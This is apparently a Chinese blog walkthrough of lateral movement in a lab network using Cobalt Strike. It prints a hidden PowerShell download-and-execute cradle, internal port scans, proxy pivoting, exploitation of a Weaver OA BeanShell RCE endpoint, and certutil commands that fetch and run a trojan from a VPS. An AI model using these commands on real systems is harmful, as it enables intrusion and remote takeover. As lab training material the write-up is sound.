cs在内网横向的使用(靶机)

在这里插入图片描述

1.cs上线目标

(1)设置监听器

在这里插入图片描述
在这里插入图片描述
添加监听
在这里插入图片描述

(2) 上线目标

如果目标可以出外网,我们可以使用让目标访问我们的cs服务器上的恶意代码,并下载执行,比较常见的就是使用如下图所使用的模块
在这里插入图片描述
根据目标的版本位数,选择是否要用 x64,点击执行后会出现如图所示窗口
在这里插入图片描述
复制代码(这里要选择x64的payload)

 powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http:///b'))"

在这里插入图片描述
直接在目标上执行该代码
在这里插入图片描述
在这里插入图片描述

上线成功

2.收集信息(内网)

shell ipconfig /all

在这里插入图片描述
使用 portscan 快速探测内网

portscan 192.168.1.115-192.168.1.125 445,3389,80,443 arp 20

在这里插入图片描述
发现内网中存在web服务器 192.168.1.123

在主机192.168.1.118 中架设内网代理,通过代理访问 192.168.1.123:80
在这里插入图片描述
在这里插入图片描述
通过视图菜单查看我们架设的代理服务器
在这里插入图片描述

在这里插入图片描述
通过火狐浏览器设置代理服务器
在这里插入图片描述
成功访问到目标内网web
在这里插入图片描述
通过查找该oa的漏洞信息,发现该OA存在RCE漏洞,直接通过该漏洞可以获得权限

http://192.168.1.123/weaver/bsh.servlet.BshServlet/
在这里插入图片描述
漏洞存在,可正常执行

漏洞利用
可以通过系统自带的下载程序,远程下载木马到本地,然后通过exec调用cmd执行该木马程序,上线cs
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

上传木马至公网vps,通过python 直接开启httpweb
在这里插入图片描述

下载木马

exec("cmd /c certutil -urlcache -split -f http://ip:8089/sweetie.exe") 

在这里插入图片描述
出现get 请求说明目标正在执行下载
在这里插入图片描述
执行木马

exec("cmd /c sweetie.exe")

目标成功上线
在这里插入图片描述
在这里插入图片描述
继续信息收集,发现目标存在双网卡,同时也发现目标第二层内网
在这里插入图片描述
发现主机 172.16.1.119 开放web,架设内网代理访问
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值